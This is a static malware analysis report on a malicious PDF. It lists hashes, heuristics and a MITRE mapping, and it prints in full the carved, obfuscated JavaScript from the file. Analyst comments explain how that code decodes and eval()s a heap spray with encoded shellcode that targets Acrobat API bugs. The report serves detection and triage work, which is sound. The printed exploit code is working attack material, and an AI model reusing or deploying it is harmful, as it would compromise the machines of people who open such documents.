Malicious PDF — malware analysis report

Static analysis result for SHA-256 e60eb62ae9b393e3…

MALICIOUS

PDF

9.7 KB Created: 2010-09-16 11:52:51 Authoring application: x2KYeHYwa (via sMOLd9SYOtY) First seen: 2026-05-10
MD5: 607d63f50bedf3b6faf54321983d4901 SHA-1: f63539b47f4dc3bf16459938d562046feda057a3 SHA-256: e60eb62ae9b393e303841f9022ff5f9c44f693c308af5b3f9dbda62e3a68216e
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript for which a high-confidence heuristic fired on eval() calls, indicating obfuscation and potential malicious execution. The presence of a JavaScript action and an embedded JS stream further supports this. The eval() call suggests the script dynamically executes code, likely to download and run a second-stage payload. No specific family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    %Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIIx\r\nII0Wn0ItTIUSqhaawYmoQm(JEcfI==IPie\r\nIIIIRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23B 8335 bytes
SHA-256: 0beb1ef0a9658efd7f57516b4ee2beca576955a05bb591763bba38092efdc7be
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/* ANALYST ANNOTATION - not part of the carved sample. The code below is the /JS stream carved
 * from object 7 (see "Extracted artifacts" above), reproduced as-is; only these comments were added.
 *
 * Stage 1 (everything visible here) is a character-substitution unpacker:
 *   cjnsU5imzP(s, i)  -> s.substr(i, 1): returns the single character at index i.
 *                        Note that the first parameter shadows the function's own name.
 *   uX8JvzEIhjzq(ch)  -> finds ch in the 71-character shuffled alphabet CEbm3I93I0nie1U929Y and
 *                        returns the character at the same index of the 71-character plain alphabet
 *                        xSnDxHyKF86; anything outside the shuffled alphabet (punctuation such as
 *                        \r \n " % ; = + - * / : [ ] &) is returned unchanged.
 *   vtpUXXpS          -> the encoded stage-2 script (a string literal spanning several lines below).
 *   MQnuJxixniW       -> accumulates the decoded characters; the last statement eval()s it, so
 *                        stage 2 only ever exists in memory inside the PDF viewer.
 *
 * Applying the two tables by hand (e.g. 'I' -> ' ', "6j5I" -> "var ", "YH0nlju0U" -> "unescape(",
 * "juuG" -> "app.") shows what stage 2 is: a heap spray (target address 0x0c0c0c0c or 0x30303030,
 * a "%u9090" NOP sled and the %u-encoded shellcode string held by the three unescape() calls below),
 * then - gated on app.viewerVersion - a call to one of Collab.collectEmailInfo, Collab.getIcon or
 * util.printf with an oversized argument, scheduled through app.setTimeOut(). The decoded JavaScript
 * text contains no download logic of its own; what the shellcode does is outside this static view.
 *
 * Detection: the stable part of this packer is stage 1 - two 71-character alphabet literals, a
 * substr(i,1) helper, a per-character lookup loop and a trailing eval() - plus the Acrobat API names
 * that only appear after decoding. The "No threats found" ClamAV result on the carved artifact above
 * is the reason rules should key on the decoded layer, not only on the raw stream.
 */
function cjnsU5imzP(cjnsU5imzP,i6WUt) {var bazLGK=cjnsU5imzP. substr (i6WUt, 1);return bazLGK;}/*d01aI9leqtMqk|AtH2AqZF3d|UTsaeR4UIUdI5*/
/* Table lookup: the loop bound is the plain alphabet's length and the comparison is against the
 * shuffled alphabet at the same index, so the two literals act as a one-to-one substitution key.
 * Falls through to `return AA1tZnOweBo` (identity) for characters not in the key. */
function uX8JvzEIhjzq(AA1tZnOweBo) {/*ypJfQeZ9mSASrFMLngfV|An1UwLx4Hutw4PCZoCB7|UpIh0*/var xSnDxHyKF86 = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*DVHBVu2phDdbLNL7I[AhFDjCF4rNb]Af4GgP1Y5YcY0*//*mBlubmShp2juwR8|A7suEPA5|AUGTKt6LVrn79Km*/var CEbm3I93I0nie1U929Y /*uXoCW23UloY0oUdjoj[yT0AohomhzPZkmDm96g]hKrXyB1Yq*/= new String("A2UiexIGL9FQMb.mw>d)rX87R{CvzoSO1haj3ls0TKVtkNWyHDup5nZY6 c<}4fPEg(qB,J");/*SeuIfZpJBM8|li3pL2mrL|A3hq5YF*/for(SCuFJjPOiMJlQlNK=0;SCuFJjPOiMJlQlNK<xSnDxHyKF86.length;SCuFJjPOiMJlQlNK++) {if(AA1tZnOweBo == cjnsU5imzP(CEbm3I93I0nie1U929Y, SCuFJjPOiMJlQlNK)) {/*zXGkgm9LvBYuSA[LqfESNQcFJ]wFY2rNPyxvax7MyV6GWQ*/return cjnsU5imzP(xSnDxHyKF86, SCuFJjPOiMJlQlNK);/*CvWV8nxEw <A2KtjY8YMuy9sAyE7]aONd9jy8MlD9Y42jnc8*/}}return AA1tZnOweBo;}/*AKXoKFp8Kn3l1G[Aq2z3e]A2xvcaNaDElasvgYtqB*//*R2tVtaOjTtcMmQ8|qMftQG|A1qXlWZ*/
/* Encoded stage 2 starts here and runs to the closing `");` several lines down. The long "%Y..."
 * spans are the %u-encoded shellcode: '%' is not in the key so it passes through, and only the
 * 'Y' is rewritten (to 'u') by the substitution. */
var MQnuJxixniW = new String;var vtpUXXpS = new String("\r\n6j5I1pyF,1O)q6g7M,ZtI=IH0 I955j<Ui;\r\n6j5IkYb5YpgER{Wm)pVq;\r\nTYHlZtDHIRzmDPHJBkFo d8TWUTYlQWK.9,f{Cp,11LInDrl3ot)KQwfj Wnie\r\nII VtW0IUTYlQWK.9,f{Cp,11GW0HKZVI*IPIAInDrl3ot)KQwfj Wnie\r\nIIIITYlQWK.9,f{Cp,11I+=ITYlQWK.9,f{Cp,11;\r\nIIx\r\nIITYlQWK.9,f{Cp,11I=ITYlQWK.9,f{Cp,11GnY3nZ5tHKU4LInDrl3ot)KQwfj WnI/IPi;\r\nII50ZY5HITYlQWK.9,f{Cp,11;\r\nx\r\nTYHlZtDHI<7ql()yFrMlFr4k USqhaawYmoQm(JEcfie\r\nII6j5Iyglo87Tk3>6 
v0Z{I=I4c4l4l4l4l;\r\nII6j5IRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b.%Y99qq%YFJ..%YPb,B%Y49Jq%Y4B(B%Yb.PJ%Yb.b.%Y99qq%Y9..F%YMBq.%YJ9PQ%Yqqf(%Y.B99%Yb,4q%Yb.bb%YFfb.%YJ9qq%YqgQF%YbF99%Ybb,(%YqgFq%Y.BF9%Y4BFJ%Yb.qg%Yb.b.%Y,BF.%Y.(MJ%YJ.Q4%YB,4B%Yb.b.%Yqqb.%Y.E99%YP9qg%YP.qQ%YqqF.%YQ.99%Yf4,B%Yb.b.%YF.b.%Y99qg%Y,(.F%YFqbM%YF9qg%Y4B.B%Yb.,b%Yb.b.%Y99bQ%YP,Q.%YFEb.%YQfJf%YP,,9%YbF9.%Y,9JB%Yb.b.%YJ9f4%YqgQ.%YbE99%Ybb,(%YqgFq%Y.BF9%Y9.4B%Yb.b.%Y,(b.%YFBb,%Y99bQ%YMQQF%YFQEg%Yf4FQ%YQ.J9%YFQF.%Y99qg%Y,(.E%YFqb9%YF9qg%Y4B.B%Yb.QQ%Yb.b.%Yb.,(%YJ9f4%YqgQ.%YbB99%YbM,(%YqgFq%Y.BF9%Y..4B%Yb.b.%Y,(b.%Yqgf4%Y..99%Ybb,(%YqgFq%Y.BF9%Yb.4B%Yb.b.%Y9bb.%YFMFg%Y4bbQ%Y4bbQ%Y4bbQ%Y4bbQ%Y4EqQ%YF(bF%YqgFQ%Y4ME(%YFMf,%Y4.f4%YqgF9%Yqg4E%YbBJP%YFPqg%YFJbE%YJQqg%YqgME%Y.fJF%YbQJB%YFJfQ%YJJqg%YbQQ.%YMQfQ%Y9qPq%YgP9b%YPQbQ%YMQFJ%Yb4fJ%Y..(f%YfMM(%YbBJF%YPfPb%YbQbP%Y9.fM%Yfb4g%YffMg%YJ9Ff%YF(49%Y4gqg%YF(qg%YbQQF%Y,JEP%YbEqg%Yqg9g%Y.EF(%YEPbQ%YbFqg%YbQqg%YFfP9%YPMFP%Yb.bB%YfF4B%Yf4ff%YF9f4%Y9EFM%Y949P%Yb.9f%YBgq,%YB4Bg%YP.E9%YqQP.%YBqqJ%YqbqJ%YB4qB%Yqfq(%Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIItTIUSqhaawYmoQm(JEcfI==Ifie\r\nIIIIyglo87Tk3>6 
v0Z{I=I4cE4E4E4E4;\r\nIIIIRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b.%Y99qq%YFJ..%YPb,B%Y49Jq%Y4B(B%Yb.PJ%Yb.b.%Y99qq%Y9..F%YMBq.%YJ9PQ%Yqqf(%Y.B99%Yb,4q%Yb.bb%YFfb.%YJ9qq%YqgQF%YbF99%Ybb,(%YqgFq%Y.BF9%Y4BFJ%Yb.qg%Yb.b.%Y,BF.%Y.(MJ%YJ.Q4%YB,4B%Yb.b.%Yqqb.%Y.E99%YP9qg%YP.qQ%YqqF.%YQ.99%Yf4,B%Yb.b.%YF.b.%Y99qg%Y,(.F%YFqbM%YF9qg%Y4B.B%Yb.,b%Yb.b.%Y99bQ%YP,Q.%YFEb.%YQfJf%YP,,9%YbF9.%Y,9JB%Yb.b.%YJ9f4%YqgQ.%YbE99%Ybb,(%YqgFq%Y.BF9%Y9.4B%Yb.b.%Y,(b.%YFBb,%Y99bQ%YMQQF%YFQEg%Yf4FQ%YQ.J9%YFQF.%Y99qg%Y,(.E%YFqb9%YF9qg%Y4B.B%Yb.QQ%Yb.b.%Yb.,(%YJ9f4%YqgQ.%YbB99%YbM,(%YqgFq%Y.BF9%Y..4B%Yb.b.%Y,(b.%Yqgf4%Y..99%Ybb,(%YqgFq%Y.BF9%Yb.4B%Yb.b.%Y9bb.%YFMFg%Y4bbQ%Y4bbQ%Y4bbQ%Y4bbQ%Y4EqQ%YF(bF%YqgFQ%Y4ME(%YFMf,%Y4.f4%YqgF9%Yqg4E%YbBJP%YFPqg%YFJbE%YJQqg%YqgME%Y.fJF%YbQJB%YFJfQ%YJJqg%YbQQ.%YMQfQ%Y9qPq%YgP9b%YPQbQ%YMQFJ%Yb4fJ%Y..(f%YfMM(%YbBJF%YPfPb%YbQbP%Y9.fM%Yfb4g%YffMg%YJ9Ff%YF(49%Y4gqg%YF(qg%YbQQF%Y,JEP%YbEqg%Yqg9g%Y.EF(%YEPbQ%YbFqg%YbQqg%YFfP9%YPMFP%Yb.bB%YfF4B%Yf4ff%YF9f4%Y9EFM%Y949P%Yb.9f%YBgq,%YB4Bg%YP.E9%YqQP.%YBqqJ%YqbqJ%YB4qB%Yqfq(%Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIIx\r\nII0Wn0ItTIUSqhaawYmoQm(JEcfI==IPie\r\nIIIIRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b.%Y99qq%YFJ..%YPb,B%Y49Jq%Y4B(B%Yb.PJ%Yb.b.%Y99qq%Y9..F%YMBq.%YJ9PQ%Yqqf(%Y.B99%Yb,4q%Yb.bb%YFfb.%YJ9qq%YqgQF%YbF99%Ybb,(%YqgFq%Y.BF9%Y4BFJ%Yb.qg%Yb.b.%Y,BF.%Y.
(MJ%YJ.Q4%YB,4B%Yb.b.%Yqqb.%Y.E99%YP9qg%YP.qQ%YqqF.%YQ.99%Yf4,B%Yb.b.%YF.b.%Y99qg%Y,(.F%YFqbM%YF9qg%Y4B.B%Yb.,b%Yb.b.%Y99bQ%YP,Q.%YFEb.%YQfJf%YP,,9%YbF9.%Y,9JB%Yb.b.%YJ9f4%YqgQ.%YbE99%Ybb,(%YqgFq%Y.BF9%Y9.4B%Yb.b.%Y,(b.%YFBb,%Y99bQ%YMQQF%YFQEg%Yf4FQ%YQ.J9%YFQF.%Y99qg%Y,(.E%YFqb9%YF9qg%Y4B.B%Yb.QQ%Yb.b.%Yb.,(%YJ9f4%YqgQ.%YbB99%YbM,(%YqgFq%Y.BF9%Y..4B%Yb.b.%Y,(b.%Yqgf4%Y..99%Ybb,(%YqgFq%Y.BF9%Yb.4B%Yb.b.%Y9bb.%YFMFg%Y4bbQ%Y4bbQ%Y4bbQ%Y4bbQ%Y4EqQ%YF(bF%YqgFQ%Y4ME(%YFMf,%Y4.f4%YqgF9%Yqg4E%YbBJP%YFPqg%YFJbE%YJQqg%YqgME%Y.fJF%YbQJB%YFJfQ%YJJqg%YbQQ.%YMQfQ%Y9qPq%YgP9b%YPQbQ%YMQFJ%Yb4fJ%Y..(f%YfMM(%YbBJF%YPfPb%YbQbP%Y9.fM%Yfb4g%YffMg%YJ9Ff%YF(49%Y4gqg%YF(qg%YbQQF%Y,JEP%YbEqg%Yqg9g%Y.EF(%YEPbQ%YbFqg%YbQqg%YFfP9%YPMFP%Yb.bB%YfF4B%Yf4ff%YF9f4%Y9EFM%Y949P%Yb.9f%YBgq,%YB4Bg%YP.E9%YqQP.%YBqqJ%YqbqJ%YB4qB%Yqfq(%Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIIx\r\nII6j5Iw5yKmvR5NrDQ}VlkI=I4cg44444;\r\nII6j5I<lEnOlqlz85XlBT6I=IRC}dtYjMBpw.n..>GW0HKZVI*IP;\r\nII6j5InDrl3ot)KQwfj WnI=Iw5yKmvR5NrDQ}VlkI-IU<lEnOlqlz85XlBT6I+I4cE,i;\r\nII6j5ITYlQWK.9,f{Cp,11I=IYH0nlju0U\"%YJ4J4%YJ4J4\"i;\r\nIITYlQWK.9,f{Cp,11I=IRzmDPHJBkFo d8TWUTYlQWK.9,f{Cp,11LInDrl3ot)KQwfj Wni;\r\nII6j5IbvlbYEq08Y58lzBWI=IUyglo87Tk3>6 v0Z{I-I4cg44444iI/Iw5yKmvR5NrDQ}Vlk;\r\nIITD5IU6j5IW403Wkb.Bq3kQmT9I=I4;IW403Wkb.Bq3kQmT9IAIbvlbYEq08Y58lzBW;IW403Wkb.Bq3kQmT9I++Iie\r\nIIII1pyF,1O)q6g7M,Zt[W403Wkb.Bq3kQmT9]I=ITYlQWK.9,f{Cp,11I+IRC}dtYjMBpw.n..>;\r\nIIx\r\nx\r\nTYHlZtDHICw7s)o>VR4qPlFHtUie\r\nII6j5I}C)BFhrw0cPpbVfcI=I4;\r\nII6j5IsRjdZnP>PB)0w,8lI=IjuuG6t0 05S05ntDHGZDvZ5tHKUi;\r\nIIjuuGlW0j5zty07YZUkYb5YpgER{Wm)pVqi;\r\n\r\nIItTIUsRjdZnP>PB)0w,8lIAIBGfie\r\nIIII<7ql()yFrMlFr4k U4i;\r\nIIII6j5I>VtN.(PZPgN.NNQkI=IYH0nlju0U\"%Y4l4l%Y4l4l\"i;\r\nIIII 
VtW0IU>VtN.(PZPgN.NNQkGW0HKZVIAIggJ(Pi>VtN.(PZPgN.NNQkI+=I>VtN.(PZPgN.NNQk;\r\nIIIIZVtnIGlDWWj3vZD50I=IQDWWj3GlDWW0lZbyjtW>HTDUe\r\nIIIIIInY3kI:I\"\"LIynKI:I>VtN.(PZPgN.NNQk\r\nIIIIx\r\nIIIIi;\r\nIIx\r\ntTIUsRjdZnP>PB)0w,8lI2=IJie\r\nIIIIZ5<Ie\r\ntTIUjuuGsDlGQDWWj3GK0Z>lDHie\r\nIIIIIIII<7ql()yFrMlFr4k UPi;\r\nIIIIIIII6j5IOHggT(rV9KXvHk(XI=IYH0nlju0U\"%4J\"i;\r\nIIIIIIII VtW0IUOHggT(rV9KXvHk(XGW0HKZVIAI4cg444iOHggT(rV9KXvHk(XI+=IOHggT(rV9KXvHk(X;\r\nIIIIIIIIOHggT(rV9KXvHk(XI=I\"8G\"I+IOHggT(rV9KXvHk(X;\r\njuuGsDlGQDWWj3GK0Z>lDHUOHggT(rV9KXvHk(Xi;\r\nIIIIIIII}C)BFhrw0cPpbVfcI=If;\r\nIIIIIIx\r\nIIIIII0Wn0Ie\r\nIIIIIIII}C)BFhrw0cPpbVfcI=If;\r\nIIIIIIx\r\nIIIIx\r\nIIIIljZlVIU0ie\r\nIIIIII}C)BFhrw0cPpbVfcI=If;\r\nIIIIx\r\nIIIItTIU}C)BFhrw0cPpbVfcI==Ifie\r\nIIIIIItTIUUsRjdZnP>PB)0w,8lI2=IBGf&&IsRjdZnP>PB)0w,8lIAIJiie\r\nIIIIIIII<7ql()yFrMlFr4k Ufi;\r\nIIIIIIII6j5IwHBK5JjnF)J qrKbI=I\"fPJJJJJJJJJJJJJJJJJJ\";\r\nIIIIIIIITD5IU{k>DHsO<dnC,lOogI=I4;I{k>DHsO<dnC,lOogIAIPBq;I{k>DHsO<dnC,lOogI++Iie\r\nIIIIIIIIIIwHBK5JjnF)J qrKbI+=I\",\";\r\nIIIIIIIIx\r\nIIIIIIIIYZtWGu5tHZTU\"%g(444T\"LIwHBK5JjnF)J qrKbi;\r\nIIIIIIx\r\nIIIIx\r\nIIx\r\nx\r\njuuG7jNFk)(6TQ5N11}KI=ICw7s)o>VR4qPlFHt;\r\nkYb5YpgER{Wm)pVqI=IjuuGn0Zzty07YZU\"juuG7jNFk)(6TQ5N11}KUi\"LIf4i;\r\n");/*oR8ABYPl{AD5kT3oAFKuWQ4VH}tt7I8ma7mcW1DE*//*G9aa3Fb9PLVfGrnraX|jVR9S4bpwetmltC|nHdmW*/
/* Decode loop: one table lookup per character of vtpUXXpS, appended to MQnuJxixniW. */
for(SILVqIsA1INIw8RjgFM=0;SILVqIsA1INIw8RjgFM<vtpUXXpS.length;SILVqIsA1INIw8RjgFM++)MQnuJxixniW += uX8JvzEIhjzq(cjnsU5imzP(vtpUXXpS,SILVqIsA1INIw8RjgFM));
/* eval() on the decoded buffer is the single point where stage 2 becomes visible; for analysis,
 * capture MQnuJxixniW here (or apply the two tables offline) instead of letting eval() run. */
eval(MQnuJxixniW);/*A2vofcF2IoOZnhU[MGj6sL]vNS2q5PV2HGhmim*/